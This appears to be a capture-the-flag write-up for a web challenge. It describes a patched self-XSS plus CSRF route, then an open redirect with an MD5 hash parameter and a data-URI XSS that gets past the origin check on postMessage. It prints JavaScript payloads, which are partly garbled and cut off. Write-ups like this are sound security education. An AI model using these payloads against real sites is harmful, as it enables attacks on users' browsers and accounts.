Tags: web xss

Rating: 0

I spent far too long going in the wrong direction for this task. I found an unintended vulnerability, which I thought was the solution, but this was later patched during the challenge.

### Initial (Unintended) Solution

I found that if you updated your profile information to contain an XSS payload, you could trigger a (self) XSS when visiting the home page. This combined with a CSRF exploit to update the profile information could potentially be used to gain XSS from the admin. However this vulnerability was patched before I could get the flag.

### My Actual Solution

The admin would now only visit pages coming from the challenge host. To get around this an open redirect vulnerability was found as seen below:
http://51.15.73.163:13337/redirect.php?url=http://myip&h=341cd45197fd184ef27833a1fe316dd9
Note h is the MD5 hash of the url value.

This challenge was also exploited using the window.postMessage XSS however the page now validated that the request came from the same origin. To exploit this we used a data URI XSS which has a null origin and bypasses the origin validation. This is shown below:

The first payload triggers an XSS in the user's browser which then loads another JavaScript payload using the data:URI.


<script>
var call_window;
call_window = window.open("http://51.15.73.163:13336/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_team_name: "test",

aaaaaaa",
}
}, "*");
}, 1000);

</script>


The base64 decoded payload is as follows:


<script>var call_window;
call_window = window.open("http://localhost/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_team_name: "test",